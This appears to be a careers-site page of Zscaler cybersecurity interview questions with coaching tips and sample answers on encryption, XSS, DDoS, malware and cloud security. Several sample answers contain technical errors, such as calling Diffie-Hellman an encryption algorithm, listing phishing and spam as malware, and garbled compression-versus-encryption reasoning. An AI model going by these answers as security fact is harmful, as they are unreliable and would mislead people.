MockQuestions MockQuestions
Interviews Questions by Career
Interviews Questions by Company
Interviews Questions by Topic
Get Started
Interview Coach 1:1
Gain the confidence you need by asking our professionals any interview scenario, question, or answer you are unsure about.
Let Us Review Your Answers
Our interviewing professionals will gladly review and revise any answer you send us. Allowing you to craft perfect responses for your next job interview.
Interview Questions by Topic
Interview Questions by Career
Interview Questions by Company

Zscaler Interview
Questions

26 Questions and Answers by Tom Dushaj

Published March 7th, 2019 | Tom Dushaj is a business and technology executive and an accomplished author of the book "Resumes That Work".
Question 1 of 26
There are different levels of data classification, how are they structured, and why are they required?
View Answers
How to Answer
With a heightened level of data security taking place throughout the world, protecting customer data has never been more important. In this day and age, data has become a valuable commodity, and companies go to great lengths to protect it at all costs. When asked by the hiring manager, don't be afraid to offer examples of how you set data classification policies or reclassified data to a classified status with access limited to administrators for example. Also, highlight your knowledge about the different levels of data classification too (IE. Restricted, Private and Public).
1000s of Interview Questions
Win your next job by practicing from our question bank. We have thousands of questions and answers created by interview experts.
26 Zscaler Interview Questions
Win your next job by practicing from our question bank. We have thousands of questions and answers created by interview experts.
Interview Questions
  1. There are different levels of data classification, how are they structured, and why are they required?
  2. What is the difference between Asymmetric and Symmetric encryption and which one is better?
  3. Tell me what your favorite security assessment tools are, and why you prefer them over others?
  4. One of the most prevalent types of attempts at intrusions we see when monitoring our clients' networks is a Distributed Denial of Service (DDoS) attack. Can you explain what a DDoS is and what you would recommend to clients to prevent it?
  5. Can you name some open source cloud computing platform databases?
  6. Most of our clients believe they have taken the necessary steps to protect themselves against malware. However since they tend to focus on a small subset of threats, this isn't usually true. Can you list the types of malware clients should be aware of?
  7. What are the various ways to inform employees about information security policies and procedures?
  8. Can you explain the security requirements we must adhere to in order to confirm that our customers' data is secure in the cloud?
  9. What's the difference between a threat, vulnerability, and a risk, and how do you assess the severity of a threat for example?
  10. Can you tell me what the difference is between stored and reflected XSS, and the common defenses against XSS?
  11. How will you detect an incident or data breach, and what steps do you take to prevent it from happening?
  12. Malicious Software, or Malware, has many meaning and connotations. What is your definition of Malware and how would you explain it to a client?
  13. If you were given the task of having to both encrypt and compress data during transmission, which would you do first, and why?
  14. Many companies are new to the cloud computing environment. How do you brief them about what security aspects come with a cloud?
  15. In a situation where a user needs admin rights on his system, what is the protocol that you follow to grant or restrict admin access?
  16. Even though we have taken measures to protect our client's data and create a secure cloud environment, some of our clients have had incidents of potential intrusion from unauthorized sources. Tell me how you advise clients to prevent intrusions.
  17. How would you educate our clients to recognize the symptoms of malware so they can notify us of an intrusion so we can begin to take measures to remediate it?
  18. Can you explain what a public and private key is in the world of public-key cryptography, and which key is used for which function?
  19. Our company provides customers with details of our policies, processes, and guidelines for setting up and managing their hosted resources. However, often the clients are confused by this information. How would you help them better understand it?
  20. Give me your opinion on Blockchain technology, and how do you think it will revolutionize cyber security?
  21. During the implementation of a hosted cloud environment, our IT team emphasizes that the most insecure component of a cloud infrastructure is the data transmission process. How do you recommend customers secure data while transferring it to the cloud?
  22. In addition to monitoring our customer's online security, we provide them with periodic reports about threats and attempts to penetrate their network. What objects do you feel should be included in a security penetration report?
  23. Can you describe the difference between a Black Hat, White Hat and Grey Hat hacker?
  24. There have been several virus attacks recently, what have you done to protect your organization from these cyber attacks?
  25. Explain the difference between symmetric and public-key cryptography, and what their importance is to encryption technology?
  26. What is a false positive and false negative alert in the case of Intrusion Detection Systems?
Suggested
Interview Q&As
Explore expert tips and resources to be more confident in your next interview.
Behavioral
Common
Phone
Tough
Leadership
All Interview Topics
All Career Q&As
Suggested Career
Interview Q&As
Continue practicing by visiting these similar question sets
Software Developer
Web Developer
Web Architect
Computer Programmer
Computer Scientist
Answer Examples
1.
There are different levels of data classification, how are they structured, and why are they required?
With a heightened level of data security taking place throughout the world, protecting customer data has never been more important. In this day and age, data has become a valuable commodity, and companies go to great lengths to protect it at all costs. When asked by the hiring manager, don't be afraid to offer examples of how you set data classification policies or reclassified data to a classified status with access limited to administrators for example. Also, highlight your knowledge about the different levels of data classification too (IE. Restricted, Private and Public).

Tom's Answer #1
"Setting data classification policy if very important, because if you don't have a policy in place, you won't know what your level of sensitivity is, which means you have no baseline or security controls to protect your data. This is an important topic to me, and I take it very seriously. My involvement goes deeper into data classification than any other team member, so I typically take the lead for data classification in three main levels. Restricted Data, Private Data, and Public Data classification. Here's how I classify these three into workable tasks.

1. Restricted Data - I apply the highest level of security to a restricted classification, because it has the highest level of risk.
2. Private Data - This one is a moderate risk level, but should still be treated as private data and protected nonetheless.
3. Public Data - Normally this level is low or no risk. While there are still controls in place, some level of control is still required."
Tom's Answer #2
"There are a number of different ways that classification of data can be performed. I've always had an interest in data collection and classification, which has led me into a Cyber Security occupation. Interestingly enough, many organizations collect and classify data in different ways. As a Data Steward, it is my obligation to reclassify data - this is conducted periodically - determine what frequency is most appropriate based on available - if after doing a data reclassification, it is determined that the data has changed or was modified, then I look at whether existing controls are consistent with the new data classification. If gaps are found within existing controls, they are immediately corrected."
2.
What is the difference between Asymmetric and Symmetric encryption and which one is better?
When comparing Asymmetric and Symmetric encryption, there are many things you need to be aware of. Not only will you need to know the difference between the two, but how they are used, and which one is better in a particular situation. It's important that you can articulate to the hiring manager examples of how you used both in specific situations and what you did to put an air-tight security solution in place that is impenetrable. Cyber Security has become one of the most important topics in technology today. Anytime you're processing credit card transactions through a payment gateway online, or at a brick and mortar retail store, you're dealing with vital consumer information, and hiring managers are going to want to hear how you keep these things protected.

Tom's Answer #1
"When I work with Asymmetric encryption, I always take into account that there has to be a private key and a public key for anyone sending a message. I have to adhere to a decryption policy for where and how the public and private is stored and shared. The way I view the differences between the two are the execution of asymmetric encryption algorithms is slower than symmetric encryption algorithms. Although the asymmetric encryption is mostly used for exchanging keys in a secure manner, it is used for establishing a secure channel over a non-secure medium such as the internet. The most common form of an encryption algorithm is Diffie-Hellman."
Tom's Answer #2
"In my current role I do work with Symmetric encryption. Since Symmetric encryption which uses a single key for encryption and decryption, I am responsible for monitoring the data transmission of those communication messages to prevent a potential intrusion or breach alert. As with many symmetric encryption algorithms, they execute faster, and are less complex than Asymmetric encryption, and are a preferred method of encryption communication. The most commonly used symmetric encryption algorithms are 3 DES, AES, DES, and RC4."
3.
Tell me what your favorite security assessment tools are, and why you prefer them over others?
There are several good software security assessment tools in the market that can get the job done very efficiently. Here are just a few that are among the more popular in the market: Metasploit, Wireshark, Nikto, Retina CS, and Aircraft.

The goal of the hiring manager is to get you to talk about your favorites so they can accurately assess your knowledge and competency with these tools. When you talk about your favorites, start from the one you like most, and try to limit it to no more than three. Ideally, you should have used all three extensively and can talk at a detailed level about what these tools can do better than others in the market. If you enjoyed working with these tools, and are passionate, let the manager know how excited you are about these tools, and why they are your favorites.

Tom's Answer #1
"Since there are so many good software security assessment tools in the market, it's hard to pick from the bunch. I do however have some favorites that I will talk about and why I like them so much. Let's start with Metasploit; in my eyes, it's considered one of the best tools for penetration testing. It helps identify vulnerabilities, it manages security assessments and improves security awareness. The next one is Wireshark; this is one I've been using for a while, and one of the reasons I like it so much is that it also serves as a network analyzer, and troubleshooter. It's flexible and operates across multiple platforms like MasOS, Windows, Linux, etc. Lastly, we have Nikto; this one I use quite a bit to scan websites for potential vulnerabilities. It has a really nice feature that allows you to find loopholes like cross-scripting, improper cookie handling, etc."
Tom's Answer #2
"Even though I have used several software security assessment tools, I'm certainly not discounting others that are not on my favorites list. Here are a couple I have used and I have a high comfort level with. Retina CS; is an open source product that handles vulnerability management very well. Aircrack is another worth mentioning. It can be used to recover lost keys by capturing data packets, and it also supports multiple platforms like Windows, Linux, Solaris, etc. It's important to keep in mind that when selecting a software security assessment tool, you need to first look at whether it's a fit for how a business model is set up. If an IT security department uses a lot of open source software and its part of how they work, you might tend to navigate towards open source software. The advantage here is that's it's free. The downside might be limited support and limited features. Something to ponder."
4.
One of the most prevalent types of attempts at intrusions we see when monitoring our clients' networks is a Distributed Denial of Service (DDoS) attack. Can you explain what a DDoS is and what you would recommend to clients to prevent it?
The interviewer is testing your knowledge of cybersecurity and attempting to ensure that you will be able to interface with clients on both a business and technical level when presenting them with the services their company offers. This type of question is best answered with a direct answer describing the topic and how you would discuss it with a client.

Tom's Answer #1
"DDoS is an attack by someone attempting to compromise your network by flooding it with a large number of requests. Many networks are unable to handle this and respond by denying service to all users, even legitimate ones. It is called a 'Distributed' attack since the flood of requests can come from many different sources. The best way to defend against a DDoS attack is to analyze and filter network traffic using 'scrubbing centers.' These are servers on the network dedicated to analyzing network traffic and removing malicious requests. Our company offers this service as part of your network security package."
Tom's Answer #2
"A Distributed Denial of Service or DDoS attack is when a threat emanates from multiple sources and attempts to overwhelm a network by creating more requests than the servers can respond to. The response is for the servers to deny all requests, both real and malicious, thereby shutting down the network. The purpose of this type of intrusion is not to hijack data, but rather to take the company offline for a period of time, which can be just as costly. The best way to defend against this type of attack is to set up scrubbing centers, which are servers that are dedicated to analyzing network traffic and blocking malicious requests while allowing legitimate traffic to cross the network. Reputable service providers like ours offer this service as part of their security package."
5.
Can you name some open source cloud computing platform databases?
By asking this question, the interviewer is testing your knowledge of open source cloud databases and trying to learn if you are familiar with and can offer options to your customers. The best way to answer this question is to name the databases you have knowledge of and recommending which one is best for your customer's requirements.

Tom's Answer #1
"There are three main open source cloud computing databases. They are Couch, Lucid and Mongo. These differ from proprietary databases based on there being no licenses required to use them and the ability of the IT community to make revisions in them to improve their performance. Of these, I believe (insert the name of the one you recommend here) is best suited for most client's needs. Not only does it have the features they require, but they won't have to pay any licensing fees, and they can upgrade it at any time."
Tom's Answer #2
"The three main open source cloud databases are Couch DB, Lucid DB, and Mongo DB. For most situations I recommend (insert the one you recommend here.) In addition to having experience with this open-sourced cloud database, I have also worked with Oracle and SQL. This has given me a good perspective on the differences between these such as licensing requirements, scalability, reliability and stability of the platform. I'm comfortable recommending this one to my clients, but if you'd like, I can also discuss either open source or proprietary cloud databases with them."
6.
Most of our clients believe they have taken the necessary steps to protect themselves against malware. However since they tend to focus on a small subset of threats, this isn't usually true. Can you list the types of malware clients should be aware of?
This question will test your knowledge of malware and the different types. You should answer this succinctly by listing the main types of malware. You can expect follow-up questions which will probe more into your knowledge of specific types of malware and what measures you recommend your clients take to protect themselves against them.

Tom's Answer #1
"There are nine major types of malware which most people are aware of. These are Viruses, Trojan Horses, Worms, Spyware, Zombie, Phishing, Spam, Adware, and Ransomware. All of these can cause damage to clients by either shutting down their systems, allowing hackers to take over the function of the computers, gain access to the data on the systems or cause the users to be subject to messages and advertising they didn't request. Each of these types of malware requires a specific type of defense strategy, but many of the strategies have common elements which can be repurposed for multiple types of malware."
Tom's Answer #2
"Most people will agree that there are nine major types of malware. These are Viruses, Trojan Horses, Worms, Spyware, Zombie, Phishing, Spam, Adware, and Ransomware. Preventing each type of malware requires a specific type of defense. These can include but are not limited to firewalls, network monitoring, user authentication, and user education. The last strategy, user education is the most effective way to limit the impact of malware. Teaching users not to open emails from unknown sources, frequently update their passwords, don't open files they didn't request or weren't expecting and regularly scanning their systems for viruses will prevent the majority of malware attacks."
7.
What are the various ways to inform employees about information security policies and procedures?
Anyone in IT leadership that is responsible for establishing and maintaining company policy and procedures for security needs to ensure that there's a system in place for monitoring corporate computers and mobile devices to protect against email viruses, malware, and data breaches. You'll find that hiring managers tend to spend a bit more time on this question because they want to gauge your level of confidence on how you implement these practices across the company and the way you communicate the procedures to all employees. The experience you share with the manager will be a reflection of your capabilities and will show that you can think outside the box. It's not uncommon for a manager to ask you to talk at length about communicating effective ways to identify phishing emails, transferring confidential files securely, password management tips, and applying privacy and security updates for all employees. This helps the manager see the level of detail that you go through to protect your company's employees.

Tom's Answer #1
"If you look at statistics on how attacks were established. You will find that over 50% of attacks came from employees within a company that inadvertently allowed access to a hacker, or simply disregarded company security policy. At my last company, I was directly involved in writing the security policies and procedures, as well as setting guidelines and conducting training sessions with employees to teach them to detect phishing emails and similar scams. I demonstrated in detail what a phishing email looks like, and what to look for when they receive one, and the procedure to follow once this type of scam is identified. I created an email account so that anyone who received these phishing emails,l could send them straight to that account."
Tom's Answer #2
"During my security training sessions with employees, I explained the importance of cyber security, and pointed out the risks of an attack and the negative impact it could have on our organization if personal employee or company information is compromised. As part of the training sessions, I discussed in detail the use of and management of strong passwords, and how to use unique characters when selecting new passwords. As a way of making sure all employees were adhering to our security policies, I set quarterly reminders for everyone to change their passwords. I also had everyone apply updates to their systems and privacy settings."
8.
Can you explain the security requirements we must adhere to in order to confirm that our customers' data is secure in the cloud?
It is likely that the interviewer already knows these regulations or has been briefed on them enough to ask the question. You should be prepared to address this question directly with the specific requirements.

Tom's Answer #1
"There are a total of four security requirements that are generally implemented in order to be compliant with user privacy laws. These are:
- Validation of input; The input data must be controlled and transmitted securely
-Backup and Security; The data is stored and secured and not open to access from unauthorized parties
- Output reconciliation; Audits must be performed that the data output is the same as the data input
- Processing; Data used by an application is controlled throughout the process and not exposed to unauthorized users."
Tom's Answer #2
"Data security is a key component of cloud security. Companies must comply with international data security regulations or they may be subject to fines or injunctions, which could ultimately cause the company to cease operations for a period of time or even permanently. Remaining in compliance with these laws is not difficult if you understand the four basic requirements common to all the laws. These are;
- Validation of input; The input data must be controlled and transmitted securely
-Backup and Security; The data is stored and secured and not open to access from unauthorized parties
- Output reconciliation; Audits must be performed that the data output is the same as the data input
- Processing; Data used by an application is controlled throughout the process and not exposed to unauthorized users"
9.
What's the difference between a threat, vulnerability, and a risk, and how do you assess the severity of a threat for example?
If you're a (CISSP) Certified Information Systems Security Professional, then you should know the difference between a threat, a vulnerability, and a risk. When you're starting a new job, you don't know the new environment, so you need to gather some basic information about where everything is, and how things were operating before you came along.

One of the first things you'll need to do is assess the landscape. You'll probably need to locate where the data resides, who is or was managing the data, and what the network diagram looks like. The hiring manager wants to see if you are experienced enough to ask these questions so that they know they're not dealing with a junior level candidate with limited experience in these areas.

After you have outlined what you would do when you start, they will dig a little deeper and ask you to explain the differences between threat, vulnerability and risk, and how you assess threats. As a general rule, you should talk about the differentiators among the three first, and then the process you follow to assess a threat. The interviewer's attention will be focused on how you assess a threat.

Here are a few items you may want to research further regarding assessments. Visibility touch points, Ingress and Egress filtering, and Vulnerability Assessments.

Tom's Answer #1
"My answer is that vulnerabilities should usually be the main focus of an organization since there is little control over the volume and consistency of threats that come in daily. In past roles when I started with a new company, the first thing that was on my task list was to perform a vulnerability assessment. This revealed a lot about the current state of risks and vulnerabilities to the network, and what needed to be done to close those gaps and secure all entry ports into the network. After doing a full assessment, I recorded visibility touch points to monitor where threats came from, and the strength and weakness of our vulnerabilities which helped me map out a long-term IT Security strategy plan."
Tom's Answer #2
"I've always been a strong believer that the best defense is a good offense. Companies are always under network security attacks, and if you leave yourself vulnerable, it's almost like playing whack-a-mole. You're constantly on the defensive when you should be pro-actively offensive. One of the methods I implemented in my last company was a Defense Threat Modeling method. This method takes monitoring to a new level by pro-actively seeking out methods that hackers use to infiltrate systems while being undetected. At the same time, I keep up to date with online periodicals from IT Security sources to learn about new threats and the risks they represent. Another way that I combat threats is by using Ingress and Egress Filtering. The Ingress method is used to prevent suspicious traffic from entering a network, and the Egress method is used to monitor or restrict data by means of a firewall that blocks packets that fail to meet the established security requirements."
10.
Can you tell me what the difference is between stored and reflected XSS, and the common defenses against XSS?
To better understand why an interviewer would ask a question about an XXS script, let's examine what it is, and how you might be positioned to best answer this question. XSS, also known as Cross Site Scripting is a script that is used to attack a network or system with a malicious virus. There are two versions of this script, the first one is a stored XSS, and the other is a reflected XSS. The stored XSS is an attack that permanently injects a script on a server or database that allows the attacker to access confidential information. The reflected XSS is similar in that it also injects a malicious script into a web server or email in the form of an error. The attacker can then access confidential information after an unsuspecting victim clicks or opens up that link.

The reason the interviewer is asking this question is to see how familiar you are with XSS scripts. Many organizations make it a policy to train their employees on how to spot malicious or harmful viruses that come in the form of an email or web browser errors. Your answer to this question should address your level of expertise in this area, and what you have done to combat these attacks in the past. Mentioning that you were a part of a training program that educated employees on how to spot malicious emails and fake links will help give the interviewer a higher level of confidence in your technical abilities in this area. It also doesn't hurt if you mention some before and after improvements of how the company is doing as a result of your training initiative. This will also show that you are pro-active as well.

Tom's Answer #1
"When I address Cross-Site Scripting (XSS), or more specifically Stored XSS attacks, my first thought is how can I prevent future attacks from happening. Since Stored XSS attacks happen without the victim knowing they've been compromised, it's important for me to look at ways that we can inform our personnel about the various methods that attackers use to make you think that an email or browser plug-in, for example, is safe. I set up periodic informational training sessions to educate our personnel on how to spot these malicious attacks, and what to do if they come across any suspicious messages or errors. Another important part of my role is to cleanse Input validation and output sanitation."
Tom's Answer #2
"Reflected XSS attacks can occur at any time, so it's important for me to educate our employees, so they don't become a victim of these unsuspecting attacks. I always take a pro-active approach to these things, and have designed a series of educational classes to educate all employees on new attacks that have been discovered, and how to respond in case they may be targeted as an unsuspecting victim. One of the many things I cover in our training sessions is to show examples of what these emails and errors look like, and how to report them as soon as you notice them. In my role, I also have to make sure that I sanitize requests from the server side scripts to further reduce or eliminate vulnerabilities."
11.
How will you detect an incident or data breach, and what steps do you take to prevent it from happening?
There are many software and hardware detection systems in the market that help prevent incidents and data breaches. Hiring managers will ask situational questions about detection and how they start. Explaining to the manager that organizations need to change their mindset about how detection is addressed will definitely give you points in the interview. Furthermore, Cyber experts should be able to articulate the procedures involved in tracking an intruder and where most companies fail with their detection systems. Don't be shy; tell the manager how much you enjoy your work, and how proud you are for setting up and maintaining an environment that that has 0% intrusion as a direct result of your security strategy and vision.

Tom's Answer #1
"An incident can happen at any time without warning, so being ready is critically important. I strongly believe that every company should have a plan B for attacks that take place without warning. Once a hacker gains access to a system, there are two main directives that they pursue. Doing reconnaissance, and exploring to understand the system. Their next steps are to find assets (Data), how to access them, all while acting in a stealth mode in the system. This is where I would be able to detect their movements, and track activity."
Tom's Answer #2
"The trick is having a strong detection system that finds an attacker early in the process to thwart or minimize data theft or other significant damage. In order to find an active attacker, there are two challenges must be addressed and solved:

1) You need to change your approach on what you look for and how you identify them
2) Look at full network activity, rather than limited packet routing

I find that the whole mindset has to change, because identifying an active attacker through the typical process of pre-defined signatures, entry behaviors, and other signs isn't the most efficient way of protecting your systems. These hackers are meticulous, and follow a step-by-step campaign to gain entry."
12.
Malicious Software, or Malware, has many meaning and connotations. What is your definition of Malware and how would you explain it to a client?
This is a 'set the table' question which the interviewer is using to qualify you as a valid candidate and also to determine if you and the interviewer agree on the terminology used in their business. Your answer should be a straightforward definition of the term and some additional explanation of how people in your industry use it.

Tom's Answer #1
"Malware is any type of software which is disruptive to normal computer operations. Not only can it damage your systems, but it can cause a security risk by gaining access to your systems and gather private information. Malware comes in several different forms including code, scripts, content which is malicious or other types of software. Malware is often unintentionally downloaded by authorized users on the network when they visit a website or click on a link."
Tom's Answer #2
"Malware is any malicious or intrusive software which is intended to disrupt a computer's operations by gaining control of the device or obtaining access to other software or private data. Malware comes in several different forms including a software program, malicious code, scripts which execute hidden commands or software which monitors the activity on a system. Malware can gain access to a system through unintentional actions by users who believe they are accessing legitimate websites or programs, or by bots and other automated programs which scan networks looking for areas of vulnerability."
13.
If you were given the task of having to both encrypt and compress data during transmission, which would you do first, and why?
This is a typical situational and task-oriented interview question that asks you to explain how you perform a task, the step-by-step process you follow, and what your reasoning is behind the process that you followed. Please note that the interviewer will be observing how you respond to this question. They will be looking at whether or not you appear to be confident in your response, or get nervous and panic while answering this question. Always keep calm, and take a deep breath before answering each question. Even if you have to wait a few seconds to respond, that's fine. It also shows the interviewer that you think through the questions before answering.

In short, both data compression and data encryption are methods that transform data into a different format. When you're talking about the tasks, and what you do in the process, let the interviewer know that even though data compression and encryption are methods that transform data, it's the execution of the process and the minor details that are important and not overlooked.

Tom's Answer #1
"Yes, there is a process that I follow that ensures safe transmission of data. When I design a data compression scheme, there are some important factors such as the level of compression required, the amount of distortion introduced by the compression, and the computational hardware/appliance resources required to compress and decompress the data.
This is especially true in the case of video compression because when you decompress, you will need to ensure that you get a stream fast enough so the viewing isn't interrupted by spooling or other latency issues. People often think that by decompressing video data, it will stream faster, but one of the issues is it requires a large amount of storage space, which could be a problem for many companies."
Tom's Answer #2
"I've heard people say compress then encrypt. The problem here is that if you encrypt first, then you'll have nothing but random data to work with, which will destroy any potential benefit you will get from the compression process. With data encryption, I focus on developing encryption algorithms (ciphers) that are hard to break by an attacker due to the computational complexities, which makes it even more difficult to be broken. Since both the sender and receiver share a secret key, it needs to be protected so that data communication is kept private between those two parties."
14.
Many companies are new to the cloud computing environment. How do you brief them about what security aspects come with a cloud?
The interviewer is testing your knowledge of security measures associated with the cloud environment and your ability to help customers manage their company's cloud.

Knowing how to advise Zscaler's clients on the benefits of the cloud, specifically on security issues, will be a huge selling point for you landing the job.

Tom's Answer #1
"Cloud environments can be as secure as computing environments hosted on-premise based on two key attributes. These are Authentication and authorization, and Control of access. Authentication allows only those users who are authorized to access the resources hosted in the cloud. These include data, applications, and storage. Control of access is a system administrator tool which enables them to allow or deny access to specific users. Together, these tools provide a safe and secure cloud environment."
Tom's Answer #2
"There are two control mechanisms which keep hosted cloud compute environments safe and secure. These are Authentication and authorization, and Control of access. Authentication and authorization prevent unauthorized parties from accessing a company's data and applications. This is also known as 'Hacking." Control of access is the methodology system administrators use to provide authorization to known users. By only allowing authorized users to enter the system and then requiring them to authenticate themselves, companies can be assured their data and other computing resources are safe from theft and misuse."
15.
In a situation where a user needs admin rights on his system, what is the protocol that you follow to grant or restrict admin access?
I have seen on numerous occasions where someone needed an important document for a proposal, and the only place the data that was needed was on a server or drive that required administrative access. If you've ever needed to access folders or files that are locked or inaccessible, then you know what I mean. This is a common question asked by hiring managers to limit the number of users accessing sensitive data. They want to know if you follow security protocols and best practices for roles and privileges. In an interview, you might hear the term (Greenplum). Greenplum is a database system that manages access to those databases using roles. Giving an example of some challenges you had with restricting access for a good reason, and then granting access after approval was given shows the manager how well you followed protocol.

Tom's Answer #1
"Managing roles and privileges has its challenges because the user could be a database administrator seeking access to specific tables or objects. As part of our security best practices, I assign rules by role membership by group. I find this to be the best way of managing privileges, this way privileges can be revoked or granted from a group as a whole. I'm intimately familiar with a Greenplum database and how it works. For example, Greenplum requires a UNIX user ID to initialize and access the Greenplum database. This protocol is pretty standard in the industry, and widely used for creating new rules, and protecting passwords in the Greenplum database."
Tom's Answer #2
"If you look at various network infrastructures and architectures within companies, you will find a variety of user/role attributes. One of the user roles that I keep a close watch on is giving access to SUPERUSERS. I like to limit access to SU's for a number of reasons, one of the biggest is SU's bypass all access privilege checks in Greenplum dataset. In my humble opinion, I think only administrators should have that access, since we are intimately involved in the protection and security of the organization."
View All 26 Zscaler Questions and Answers
Sign up to access our library of 50,000+ Q&As,
plus coaches for one-on-one support, so you can interview more confidently.
More Interview Q&As
Explore expert tips and resources to be more confident in your next interview.
Behavioral
Common
Phone
Tough
Leadership
All Interview Topics
All Career Q&As
Suggested Career
Interview Q&As
Continue practicing by visiting these similar question sets
Software Developer
Web Developer
Web Architect
Computer Programmer
Computer Scientist
Disclaimer
Our interview questions and answers are created by experienced recruiters and interviewers. These questions and answers do not represent any organization, school, or company on our site. Interview questions and answer examples and any other content may be used else where on the site. We do not claim our questions will be asked in any interview you may have. Our goal is to create interview questions and answers that will best prepare you for your interview, and that means we do not want you to memorize our answers. You must create your own answers, and be prepared for any interview question in any interview.